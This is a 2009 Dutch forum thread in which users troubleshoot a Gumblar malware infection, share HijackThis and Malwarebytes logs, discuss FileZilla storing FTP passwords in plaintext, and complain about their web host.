Flikker op met je mac. Er staat er hier 1. Ik blijf mooi op windows.
Trouwens, zet jullie semi geile kwijlsessies op linux en apple eens elders voort gaarne.
zou je gewoon op willen zoutenquote:Op dinsdag 11 augustus 2009 14:28 schreef Walter_Sobchak het volgende:
[..]
Ben je mal? Ik vermaak me hier prima. Ik krijg er altijd gevoel bij.
Via adobe flash en reader. Geen idee hoe het precies werkt, ik heb nog geen last van het kreng gehadquote:Op dinsdag 11 augustus 2009 14:27 schreef CasB het volgende:
[..]
Ik kan er ook niks aan doen dat de beveiliging van Windows zo slecht is. Ik heb zelf ook wel eens last gehad van malware in Windows, en het is te belachelijk voor woorden dat de enige oplossing is dat je je pc moet formatteren.
Maar dat terzijde.
Via wat voor flash/adobe programma ben je er dan eigenlijk aangekomen? Kan dat al als je op een site komt met dat iframe?
Meeste mensen snappen van dat in het register spitten ook geen drol. Dus als dat niet lukt, dan blijft echt alleen formatteren over. Het scheelt in ieder geval een hoop tijd aan uitzoeken. Maar goed, we kijken eerst maar wat Malwarebytes oplevert.quote:Op dinsdag 11 augustus 2009 14:31 schreef Qwea het volgende:
[..]
Via adobe flash en reader. Geen idee hoe het precies werkt, ik heb nog geen last van het kreng gehad
En formatten is IMHO ook wel erg rigoreus. Als ik een virus niet "normaal" weg krijg dan ga ik in het register spitten
Nou ja, tijd aan uitzoeken? Weet je hoe omslachtig formatten is? Je kan alle partities gaan formatten. Dus je moet een back up maken, windows opnieuw installen, ectquote:Op dinsdag 11 augustus 2009 14:50 schreef Mr.Noodle het volgende:
[..]
Meeste mensen snappen van dat in het register spitten ook geen drol. Dus als dat niet lukt, dan blijft echt alleen formatteren over. Het scheelt in ieder geval een hoop tijd aan uitzoeken. Maar goed, we kijken eerst maar wat Malwarebytes oplevert.
Sorry hoor, maar er staat VIRUS in de OP, de link in de OP is weggehaald, en er staat een waarschuwing. En toch ga je nog klikken?quote:Op dinsdag 11 augustus 2009 15:08 schreef Noork het volgende:
Damn, heb net wat spyware opgelopen op jouw site. AVG hield het vreemdgenoeg niet goed tegen.
Moet toch zien waar het over gaatquote:Op dinsdag 11 augustus 2009 15:24 schreef Qwea het volgende:
[..]
Sorry hoor, maar er staat VIRUS in de OP, de link in de OP is weggehaald, en er staat een waarschuwing. En toch ga je nog klikken?
Ik krijg iig geen avast melding meer
quote:Op dinsdag 11 augustus 2009 15:27 schreef MissBliss het volgende:
Volgens mij is Malwarebytes vastgelopen![]()
Als ik hem maximaliseer krijg ik zo'n wit scherm
Ik vind het alleen een beetje dom van jequote:Op dinsdag 11 augustus 2009 15:31 schreef Noork het volgende:
[..]
Moet toch zien waar het over gaatEn ik verwijt niemand, geef het alleen maar aan. Meestal val ik met Opera als browser en AVG buiten schot bij dit soort virussen...
Is al opgelost. Hijackthis en een paar dingen verwijderen was voldoende.quote:Op dinsdag 11 augustus 2009 15:32 schreef Qwea het volgende:
[..]
Ik vind het alleen een beetje dom van jeMaar goed
Ga maar malware draaien!
Taakbeheer liep zelfs vastquote:Op dinsdag 11 augustus 2009 @ 15:31 schreef Qwea het volgende:
[..]
Ooh boy.
En als je hem in veilige modus draait?
Dat staat er niet meer inquote:Op dinsdag 11 augustus 2009 @ 15:35 schreef CantFazeMe het volgende:
Haal het linkje weg uit de OP misschien.
Dank je.quote:Op dinsdag 11 augustus 2009 15:37 schreef MissBliss het volgende:
[..]
Dat staat er niet meer inEr staat zelfs een waarschuwing!
Ik zal hem wel even uit mn sig halen ook.
?quote:
Mn hijackthis log. Roept u maar!quote:Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 15:52:04, on 11-8-2009
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v8.00 (8.00.6001.18813)
Boot mode: Normal
Running processes:
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Samsung\EBM\EasyBatteryMgr3.exe
C:\Program Files\Samsung\Samsung Magic Doctor\MagicDoctorKbdHk.exe
C:\Program Files\SAMSUNG\EasySpeedUpManager\EasySpeedUpManager.exe
C:\Program Files\Samsung\Easy Display Manager\dmhkcore.exe
C:\Program Files\Samsung\Samsung Update Plus\SUPBackground.exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Alwil Software\Avast4\ashDisp.exe
C:\Windows\system32\igfxsrvc.exe
C:\Windows\system32\igfxext.exe
C:\Program Files\Lavasoft\Ad-Aware\AAWTray.exe
C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
C:\Program Files\Alwil Software\Avast4\ashSimpl.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O1 - Hosts: ::1 localhost
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
O2 - BHO: Windows Live Aanmelden - Help - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [IgfxTray] C:\Windows\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\Windows\system32\hkcmd.exe
O4 - HKLM\..\Run: [Persistence] C:\Windows\system32\igfxpers.exe
O4 - HKLM\..\Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKLM\..\RunOnce: [Malwarebytes' Anti-Malware] C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe /install /silent
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
O13 - Gopher Prefix:
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
O23 - Service: Lavasoft Ad-Aware Service - Lavasoft - C:\Program Files\Lavasoft\Ad-Aware\AAWService.exe
--
End of file - 3746 bytes
Ik geloof je wel hoor.quote:
Nou dan heb je nog weinig spannende data. Formateren maar.quote:Op dinsdag 11 augustus 2009 15:49 schreef Qwea het volgende:
Het bestand in file:///C:/Users/Qwea/AppData/Roaming/Mozilla/Firefox/Profiles/zgodd7xy.default/
en dan die formhistory kan ook gewoon niet verwijderd wordenennu zittie ook in places
ik had godverdomme net mn laptop gekocht en geconfigged donderdag!
ik heb nooit spannende data wat niet 30x gebackupt is.quote:Op dinsdag 11 augustus 2009 15:53 schreef Swetsenegger het volgende:
[..]
Nou dan heb je nog weinig spannende data. Formateren maar.
als jij mn hijackthis log wil checken?quote:Op dinsdag 11 augustus 2009 15:53 schreef CantFazeMe het volgende:
[..]
Ik geloof je wel hoor.![]()
Verwijder hem maar snel.
dikke stront dus, blijkbaarquote:Op dinsdag 11 augustus 2009 15:53 schreef MissBliss het volgende:
Je hebt toch Vista? Daar kon het toch juist niet op komen?
't ziet er goed uit juist. Hardnekkig die Gumblar. Kan je ook Malwarebytes erop los laten?quote:Op dinsdag 11 augustus 2009 15:55 schreef Qwea het volgende:
[..]
als jij mn hijackthis log wil checken?
Malware is al bezig. Hijack was eerder klaarquote:Op dinsdag 11 augustus 2009 15:59 schreef CantFazeMe het volgende:
[..]
't ziet er goed uit juist. Hardnekkig die Gumblar. Kan je ook Malwarebytes erop los laten?
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file) <<< Fix checked
oobefldr.dll <<< Onderdeel van Vista? Denk t wel.
http://www.google.nl/search?hl=nl&q=oobefldr.dll&btnG=Zoeken&meta=lr%3Dlang_nl
Nee niet echt, die (no file) kun je eventueel verwijderen, maar de rest niet. Die no file doet niks zeg maarquote:Op dinsdag 11 augustus 2009 16:01 schreef Qwea het volgende:
[..]
Malware is al bezig. Hijack was eerder klaar
Windows errors related to oobefldr.dll?
oobefldr.dll is a process belonging to the Microsoft® Windows® Operating System program . "oobefldr.dll is a Welcome Center Component" "from Microsoft Corporation" "belonging to Microsoft® Windows® Operating System"
ik hoef dus niks te verwijderen en kan hem (hijackthis) afsluiten?
Ik snap niet wat je precies typt, maar ik gebruik dus ook filezilla en het ergerde me juist zo dat ie mn inloggegevens nooit onthieldquote:Op dinsdag 11 augustus 2009 @ 16:05 schreef Swetsenegger het volgende:
Het ontging me even hoe gumblar aan ftp gegevens kwam, maar ik zie nu dat bv filezilla sinds versie 3 de passes in plaintext in een xml tieft
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)quote:Op dinsdag 11 augustus 2009 16:04 schreef CantFazeMe het volgende:
[..]
Nee niet echt, die (no file) kun je eventueel verwijderen, maar de rest niet. Die no file doet niks zeg maar
Ok. Laat die dll maar staan idd.
ja, daar kwam MM gisteren ook achterquote:Op dinsdag 11 augustus 2009 16:05 schreef Swetsenegger het volgende:
Het ontging me even hoe gumblar aan ftp gegevens kwam, maar ik zie nu dat bv filezilla sinds versie 3 de passes in plaintext in een xml tieft
Als je meerdere partities hebt is het alleen maar makkelijker. Je kan de virusscanner en malwarescanner er op los laten. Maar daar zul je weinig kwaadaardigs vinden. Zeker omdat er op andere partities niet het besturingssysteem staat. Enige wat geinfecteerd wordt is de partitie met Windows erop. Daar staat het register in en daar worden alle taken van programma's uitgevoerd.quote:Op dinsdag 11 augustus 2009 15:24 schreef Qwea het volgende:
[..]
Nou ja, tijd aan uitzoeken? Weet je hoe omslachtig formatten is? Je kan alle partities gaan formatten. Dus je moet een back up maken, windows opnieuw installen, ect
Je laat het een beetje klinken alsof formatten binnen een half u gepiept iswast maar zo simpel
quote:Op dinsdag 11 augustus 2009 16:09 schreef Mr.Noodle het volgende:
[..]
Als je meerdere partities hebt is het alleen maar makkelijker. Je kan de virusscanner en malwarescanner er op los laten. Maar daar zul je weinig kwaadaardigs vinden. Zeker omdat er op andere partities niet het besturingssysteem staat. Enige wat geinfecteerd wordt is de partitie met Windows erop. Daar staat het register in en daar worden alle taken van programma's uitgevoerd.
vroegah sloeg filezilla je ftp gegevens gecodeerd op in een bestandje. Als je dat bestandje opende stond je wachtwoord 'ikke' bv als Gj6%4juy erin. Kortom, gecodeerd. Als gumbar probeert in te loggen met Gj6%4juy komt ie niet op je website.quote:Op dinsdag 11 augustus 2009 16:08 schreef MissBliss het volgende:
[..]
Ik snap niet wat je precies typt, maar ik gebruik dus ook filezilla en het ergerde me juist zo dat ie mn inloggegevens nooit onthieldMaar dat doet ie dus kennelijk wél
Gumblar is toch (ook) een packet sniffer, die je passwords jat als je inlogt, en ze dus niet uitleest uit een bestand?quote:Op dinsdag 11 augustus 2009 16:05 schreef Swetsenegger het volgende:
Ok. Kan je daar nog iets aan doen? Of is dat gewoon een minpunt van Filezilla?quote:Op dinsdag 11 augustus 2009 @ 16:12 schreef Swetsenegger het volgende:
[..]
vroegah sloeg filezilla je ftp gegevens gecodeerd op in een bestandje. Als je dat bestandje opende stond je wachtwoord 'ikke' bv als Gj6%4juy erin. Kortom, gecodeerd. Als gumbar probeert in te loggen met Gj6%4juy komt ie niet op je website.
tegenwoordig zet Filezilla gewoon 'ikke' in een bestandje. platte tekst dus. Niet gecodeerd. En zo komt gumbar aan passwords. Wat andere ftp clients doen weet ik niet.
Andere ftp prog nemen?quote:Op dinsdag 11 augustus 2009 16:14 schreef MissBliss het volgende:
[..]
Ok. Kan je daar nog iets aan doen? Of is dat gewoon een minpunt van Filezilla?
Geniaal!!quote:Op dinsdag 11 augustus 2009 16:05 schreef Swetsenegger het volgende:
Ik heb zo lang gezocht naar een handig ftp-progquote:Op dinsdag 11 augustus 2009 @ 16:15 schreef Qwea het volgende:
[..]
Andere ftp prog nemen?
Heeft jouw malware dinges al wat gevonden?
Ik draai malware, en adawarequote:Op dinsdag 11 augustus 2009 16:17 schreef MissBliss het volgende:
[..]
Ik heb zo lang gezocht naar een handig ftp-prog
Nee, ik heb even tussendoor een ander programma laten draaien, superantispyware, die heeft inmiddels al 96 threats gevondenDaarna doe ik mailwaren-dinges wel weer.
Nou, ja,quote:
formhistory.sql is het bestand wat firefox aanmaakt waar je zoekhistory in staat, of van formulieren, dus het is niet zo gek dat het er weer staat.quote:Op dinsdag 11 augustus 2009 16:24 schreef Qwea het volgende:
zodra ik ff weer opnieuw opstart en naar C:\Users\Qwea\AppData\Roaming\Mozilla\Firefox\Profiles\zgodd7xy.default\
ga is formhistory.sqlite er weer!
aaahquote:Op dinsdag 11 augustus 2009 16:35 schreef CasB het volgende:
[..]
formhistory.sql is het bestand wat firefox aanmaakt waar je zoekhistory in staat, of van formulieren, dus het is niet zo gek dat het er weer staat.
Nou ja, aVast detecteert het probleem, dat is iig wat meer dan andere virusscanners doen..quote:Op dinsdag 11 augustus 2009 16:34 schreef Qwea het volgende:
[..]
Nou, ja,ehm
Ik snap het alleen niet. Hij zegt wel BAD IFRAME BAD IFRAME! en dan connectie verbreken, en dan vervolgens toch het iframe inladendas krom
malware bytes is wel een poosje bezig zegal 50 min
ff uitleggen wat je nou precies moet doen om te zorgen dat hij bij opstarten niet weer alles inlaadt uit een vorige sessiequote:
avast ziet hem hier niet eensquote:Op dinsdag 11 augustus 2009 16:38 schreef Re het volgende:
[..]
ff uitleggen wat je nou precies moet doen om te zorgen dat hij bij opstarten niet weer alles inlaadt uit een vorige sessie
Ik vind dat ze de kutklerelijers van zo'n virus voor een trein moeten duwenquote:Op dinsdag 11 augustus 2009 16:39 schreef Re het volgende:
bij IT zijn ze trouwens ook nog bezig op mijn laptop
ja dat klopt toch, gumbler zorgt ervoor dat je een fake google.com als homepage krijgtquote:Op dinsdag 11 augustus 2009 16:38 schreef Qwea het volgende:![]()
ik die superantispyware opstarten.. is mijn homepage in IE (wat ik nooit gebruik) google.com, krijg ik opeens een melding dat iets mijn homepage probeert te veranderen naar google.com/redirect nog wat
Heb ik iets gemist? Is avast niet goed?quote:
Ja... alleen ik maar hopen dat ik toch geen gumblar hadquote:Op dinsdag 11 augustus 2009 16:40 schreef Re het volgende:
[..]
ja dat klopt toch, gumbler zorgt ervoor dat je een fake google.com als homepage krijgt
quote:Malwarebytes' Anti-Malware 1.40
Database versie: 2601
Windows 6.0.6001 Service Pack 1
11-8-2009 16:46:32
mbam-log-2009-08-11 (16-46-32).txt
Scan type: Volledige Scan (C:\|D:\|)
Objecten gescand: 181146
Verstreken tijd: 1 hour(s), 0 minute(s), 42 second(s)
Geheugenprocessen geïnfecteerd: 0
Geheugenmodulen geïnfecteerd: 0
Registersleutels geïnfecteerd: 0
Registerwaarden geïnfecteerd: 0
Registerdata bestanden geïnfecteerd: 0
Mappen geïnfecteerd: 0
Bestanden geïnfecteerd: 0
Geheugenprocessen geïnfecteerd:
(Geen kwaadaardige items gevonden)
Geheugenmodulen geïnfecteerd:
Registersleutels geïnfecteerd:
Registerwaarden geïnfecteerd:
Registerdata bestanden geïnfecteerd:
Mappen geïnfecteerd:
Bestanden geïnfecteerd:
Dan komt het erop neer dat je je Register even door moet spitten (ja erg tijdrovend). En dat is per virus weer verschillend. Principe is wel vaak hetzelfde, ergens in een register staat een verwijzing naar een bestand om het virus weer terug te kopieren als het verwijderd is. Tevens komt de registersleutel ook weer terug in de HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run of HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce of HKEY_LOCAL_MACHINE\SOFTWARE\Windows\CurrentVersion\Explorer terecht.quote:Op dinsdag 11 augustus 2009 16:38 schreef Re het volgende:
[..]
ff uitleggen wat je nou precies moet doen om te zorgen dat hij bij opstarten niet weer alles inlaadt uit een vorige sessie
Ik heb geboot, en draai opnieuw malwarebytes. Alstie namelijk na een boot terug komt, moet ik er nu ook weer zijn.quote:Op dinsdag 11 augustus 2009 16:53 schreef Mr.Noodle het volgende:
[..]
Dan komt het erop neer dat je je Register even door moet spitten (ja erg tijdrovend). En dat is per virus weer verschillend. Principe is wel vaak hetzelfde, ergens in een register staat een verwijzing naar een bestand om het virus weer terug te kopieren als het verwijderd is. Tevens komt de registersleutel ook weer terug in de HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run of HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce of HKEY_LOCAL_MACHINE\SOFTWARE\Windows\CurrentVersion\Explorer terecht.
Ik weet het niet precies, heb het virus zelf niet. Maar wel een soortgelijk ander virus ooit op m'n Windows machine gehad, die toevallig z'n verborgen bestand ergens in de prullenbak verborgen gehad en dat was erg naar te verwijderen omdat je em gewoon niet kan zien door op het prullenbakje te klikken enkel door een speciaal commando via de dos-prompt te gebruiken, waardoor die ineens wel te zien was. Hij was niet handmatig te verwijderen (vanwege systeemrestricties oid) enkel Malwarebytes kon em wel weg krijgen..
Ik begin ook te denken dat het virus niet (meer) op deze pc staat.quote:Op dinsdag 11 augustus 2009 @ 17:01 schreef An24 het volgende:
Hier dus ook zelfde probleem. Zit ook bij pc extreme. Ik had ook een trojan op mijn pc zitten, maar nu is pc helemaal schoon. Het virus staat dan ook niet lokaal, maar komt alleen van de server vandaan> Dizer helpt ook mij door het probleem heen.
(En natuurlijk zegt pc extreme dat ze het niet snappen, zou ik ook zeggen
quote:How to remove the infection from a website
If you manage websites using an FTP program, there is a chance that your sites have become infected. The first thing you must do is change the ftp passwords after your machine has been cleaned.
As yet, I am unaware of any automated script which removes the infection from a website, so I wrote my own and applied it to 5 of the websites that I manage that were infected.
I started off using the script by rad-one at http://blog.unmaskparasit(...)page-1/#comment-896.
I modified it heavily to use PHP regular expressions, to remove the gumblar modifications in html, php, and js files (it scans files with all extensions except .bak). Unlike rad-one’s detection script, this one yielded zero false positives for me, and eradicated the infection completely, as far as I can tell.
Here is what my script does:
1. Recurses through the whole website, excluding files and/or directories of your choosing.
2. Applies regular expressions to remove the infection from all the files (except those with the .bak extension) in each directory.
3. All modified files are backed up using the .bak extension.
4. Removes all files with paths ending in /images/image.php or /images/gifimg.php.
5. Runs in report mode by default, so you can see which files would be modified.
6. Has a “verbose” option, so you can see how each file will be modified.
It does not change directory permissions. I haven’t got around to investigating that area yet.
You may download it here. (Use at your own risk.)
Instructions for use
1. Place the file scan_files.php at your web document root.
2. Invoke it with no parameters to run it in report mode, where no modifications will be made.
3. Use scan_files.php?v=1 to run it in verbose mode.
4. Use scan_files.php?u=1 to run it in update mode, where the modifications will actually be made.
5. Use scan_files.php?u=1&v=1 to run it in both update and verbose modes.
Bron
ik draai geen ftp prog hierquote:Op dinsdag 11 augustus 2009 17:16 schreef Mr.Noodle het volgende:
Nou goed eerste stap is gezet, als het virus niet meer op de pc's staat moet het alleen nog van alle websites gehaald worden.
[..]
Check nog even voor referenties naar Gumblar, zou even goed ook nog op andere locaties in het register kunnen staan.quote:Op dinsdag 11 augustus 2009 17:08 schreef Qwea het volgende:
hij lijkt niet in mn register voor te komen, ook ;
[ afbeelding ]
[ afbeelding ]
Nou nee niet echt, het blijft vaak abracadabra.. MalwareBytes bij jou ook niks gevonden?quote:Op dinsdag 11 augustus 2009 17:22 schreef MissBliss het volgende:
Is er een makkelijke manier om in dat register te kijken dan?
voor die referenties.. moet ik dan alles handmatig nalopen?quote:Op dinsdag 11 augustus 2009 17:21 schreef Mr.Noodle het volgende:
[..]
Check nog even voor referenties naar Gumblar, zou even goed ook nog op andere locaties in het register kunnen staan.
Verder nog even MSConfig starten, kijken naar wat er bij "opstarten" en "services" en de opstart referenties daarin..
Die is nog bezigquote:Op dinsdag 11 augustus 2009 @ 17:23 schreef Mr.Noodle het volgende:
[..]
Nou nee niet echt, het blijft vaak abracadabra.. MalwareBytes bij jou ook niks gevonden?
Gewoon zoeken aanklikken.. CTRL-F en daar gumblar intypen. In Services staat het vaak niet onder eigen naam, maar vaak een verwijzing naar een vaag bestand zoals bijvoorbeeld: "C:\WINDOWS\ukvvq.qnx", dat zou bij jezelf ook een belletje dan moeten rinkelen. Overigens is het backup bestand vaak random een naam gegeven, wat het nog moeilijker maakt om het te detecteren..quote:Op dinsdag 11 augustus 2009 17:25 schreef Qwea het volgende:
[..]
voor die referenties.. moet ik dan alles handmatig nalopen?
[ afbeelding ]
ik kan in services geen gumblar vinden
Bij een format, weet je zeker dat het echt weg is..quote:Op dinsdag 11 augustus 2009 17:27 schreef MissBliss het volgende:
[..]
Maar hoe weet ik nou ooit of het echt weg is?
Stomme vraag, maar waar vind ik die? Bij current user en dan software oid?quote:Op dinsdag 11 augustus 2009 17:28 schreef Mr.Noodle het volgende:
[..]
Gewoon zoeken aanklikken.. CTRL-F en daar gumblar intypen. In Services staat het vaak niet onder eigen naam, maar vaak een verwijzing naar een vaag bestand zoals bijvoorbeeld: "C:\WINDOWS\ukvvq.qnx", dat zou bij jezelf ook een belletje dan moeten rinkelen. Overigens is het backup bestand vaak random een naam gegeven, wat het nog moeilijker maakt om het te detecteren..
Overigens als je IE zoekpad ook aangepast is, moet je in het register bij de Internet Explorer, Search items kijken. Wellicht dat daar nog een gewijzigd pad staat..
Current user en Local Machinequote:Op dinsdag 11 augustus 2009 17:31 schreef Qwea het volgende:
[..]
Stomme vraag, maar waar vind ik die? Bij current user en dan software oid?
quote:Op dinsdag 11 augustus 2009 @ 17:28 schreef Mr.Noodle het volgende:
[..]
Bij een format, weet je zeker dat het echt weg is..
Sorry, maar dit is echt eerlijk geantwoord. Ik weet ook niet alles, virussen van tegenwoordig volgen geen vast patroon meer, als in niet altijd dezelfde bestandsnamen, andere verwijzingen, verschillende locaties en programma's die ze infecteren. Ligt maar net aan wat er allemaal op de PC aan software staat. Ik kan er niet op kijken..quote:
en die host files staan daar ook?quote:Op dinsdag 11 augustus 2009 17:32 schreef Mr.Noodle het volgende:
[..]
Current user en Local Machine
en check je hosts-file en je hosts.sam
Nee, die staan in je Windows Map. Gewoon even zoeken in Windows aanklikken en zoeken op "hosts". Dat zijn als het goed is tekstbestandjes die gebruikt worden door je browsers om te linken naar bepaalde sites. Soms staan daar ook dingen in die niet helemaal te vertrouwen zijn, bijvoorbeeld een link naar een IP-adres van een website met dezelfde spyware/malware.quote:
Ja, oké. Je bent nu toch bezig. Maar kijk nu even hoeveel tijd, hoeveel beveiligingsprogramma's later en hoeveel andere personen je hebt moeten op trommelen om het probleem te verhelpen.. Eigenlijk is het toch gewoon te gek voor woorden?quote:Op dinsdag 11 augustus 2009 17:38 schreef MissBliss het volgende:
Ja, ik snap het wel, maar formatteren is echt een laatste redmiddel hoor, imho. Ik ga eerst wel aan de slag met al die programma's enzo.
*gaat zoeken in C : windowsquote:Op dinsdag 11 augustus 2009 17:44 schreef Mr.Noodle het volgende:
[..]
Nee, die staan in je Windows Map. Gewoon even zoeken in Windows aanklikken en zoeken op "hosts". Dat zijn als het goed is tekstbestandjes die gebruikt worden door je browsers om te linken naar bepaalde sites. Soms staan daar ook dingen in die niet helemaal te vertrouwen zijn, bijvoorbeeld een link naar een IP-adres van een website met dezelfde spyware/malware.
Dat zou dus betekenen dat google.com indirect weer naar die vage link leidt.
Dat is je profiel van Firefox waar al je history, settings in wordt opgeslagen. Het kan geïnfecteerd zijn, maar vaak is het een standaardonderdeel van Firefox. Dat die map zo raar heet is niet erg in dit geval. Is bij mijn Windows machine ook.quote:Op dinsdag 11 augustus 2009 17:48 schreef Qwea het volgende:
ik kan geen search files vinden van IE.
Wat is dit eigk?
[ afbeelding ]
aahquote:Op dinsdag 11 augustus 2009 17:52 schreef Mr.Noodle het volgende:
[..]
Dat is je profiel van Firefox waar al je history, settings in wordt opgeslagen. Het kan geïnfecteerd zijn, maar vaak is het een standaardonderdeel van Firefox. Dat die map zo raar heet is niet erg in dit geval. Is bij mijn Windows machine ook.
Ja oke, maar een format C kost ook een berg tijd en moeite hoor! Eerst het backuppen en daarna weer alles terugzetten en programma's opnieuw installeren enzo.quote:Op dinsdag 11 augustus 2009 @ 17:46 schreef Mr.Noodle het volgende:
[..]
Ja, oké. Je bent nu toch bezig. Maar kijk nu even hoeveel tijd, hoeveel beveiligingsprogramma's later en hoeveel andere personen je hebt moeten op trommelen om het probleem te verhelpen.. Eigenlijk is het toch gewoon te gek voor woorden?
Database versie: 2601
Windows 5.1.2600 Service Pack 3
11-8-2009 18:06:36
mbam-log-2009-08-11 (18-06-36).txt
Scan type: Volledige Scan (C:\|J:\|)
Objecten gescand: 261566
Verstreken tijd: 1 hour(s), 19 minute(s), 38 second(s)
Registersleutels geïnfecteerd: 4
Registerwaarden geïnfecteerd: 6
Mappen geïnfecteerd: 1
Bestanden geïnfecteerd: 5
HKEY_CLASSES_ROOT\wvfsrqab.bbwl (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_CLASSES_ROOT\wvfsrqab.toolbar.1 (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Bind (Malware.Trace) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VSPlugin (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Extensions\CmdMapping\{c5428486-50a0-4a02-9d20-520b59a9f9b2} (Adware.Shopping.Report) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Extensions\CmdMapping\{c5428486-50a0-4a02-9d20-520b59a9f9b3} (Adware.Shopping.Report) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Settings\bf (Trojan.Agent) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Settings\bk (Trojan.Agent) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Settings\iu (Trojan.Agent) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Settings\mu (Trojan.Agent) -> Quarantined and deleted successfully.
Mappen geïnfecteerd:
C:\WINDOWS1\system32\LocalService32 (Worm.Archive) -> Quarantined and deleted successfully.
Bestanden geïnfecteerd:
C:\Documents and Settings\user.USER-70FB3322FA\Local Settings\Temp\~TM69.tmp (Trojan.Agent) -> Quarantined and deleted successfully.
C:\Documents and Settings\user.USER-70FB3322FA\Menu Start\Programma's\Opstarten\ikowin32.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\WINDOWS1\system32\LocalService32\29.tmp (Worm.Archive) -> Quarantined and deleted successfully.
C:\Documents and Settings\user.USER-70FB3322FA\Application Data\wiaserva.log (Malware.Trace) -> Quarantined and deleted successfully.
C:\WINDOWS1\Temp\wpv441249365049.exe (Trojan.Agent) -> Quarantined and deleted successfully.
quote:Op dinsdag 11 augustus 2009 @ 18:47 schreef An24 het volgende:
PC extreme gebeld. Ze zijn dus al langer belend met het virus, maar komen er maar niet achter waar hij bij hun psies vandaan komt. De collega die dit behandeld belt mij morgenochtend om 9 uur terug![]()
Ik ga het echt niet zelf oplossen he, ze geven nu gewoon toe dat ze wel degelijk het probleem vormen in ons geval, MB!
Ik heb ze gebeld, tegen mij zijn ze nog in de ontkenningsfasequote:Op dinsdag 11 augustus 2009 @ 18:53 schreef MissBliss het volgende:
Heb je de helpdesk a 45ct per minuut gebeld? Want nu wil ik ze ook bellen.
Oh, dat ga ik proberen!quote:Op dinsdag 11 augustus 2009 @ 18:59 schreef freud het volgende:
Het is ook best triest van PCExtreme... Zocht even snel online, en er zijn veel mensen met klachten. Lokaal bij An24 geen virussen (gescand met meerdere scanners), en alleen de bestanden aan de kant van PCE zijn veranderd. Zeer slecht dat ze uberhaupt geinfecteerd zijn, en nog triester dat ze blijkbaar wintel servers hebben (en geen *UX).
